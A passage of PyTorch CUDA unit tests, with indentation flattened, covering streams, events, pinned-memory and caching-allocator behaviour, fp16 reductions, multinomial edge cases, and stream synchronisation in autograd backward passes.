self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
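# The pattern exercised above, roughly: when a tensor allocated on one stream
# is consumed on another, call tensor.record_stream(consumer_stream) so the
# caching allocator does not hand the tensor's memory back out until the
# consumer stream's pending work has finished.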
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For a reliable test,
# the stream used to allocate tensors is isolated; the allocator will not
# reuse free blocks that were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
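# Sketch of the host->device overlap pattern this caching supports (names are
# illustrative):
#     staging = torch.empty(n, pin_memory=True)      # page-locked host buffer
#     dev = torch.empty(n, device='cuda')
#     dev.copy_(staging, non_blocking=True)          # async copy on the current stream
# The pinned block must not be reused until the async copy completes, which is
# what the assertions above check.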
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would overflow to a negative value,
# giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects a leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
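# Per the "Stream semantics of backward passes" note linked above, grads
# produced on a side stream should only be consumed after syncing with it,
# e.g. via consumer_stream.wait_stream(producer_stream), or by consuming them
# inside the same stream context that called backward().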
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are
# inserted when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
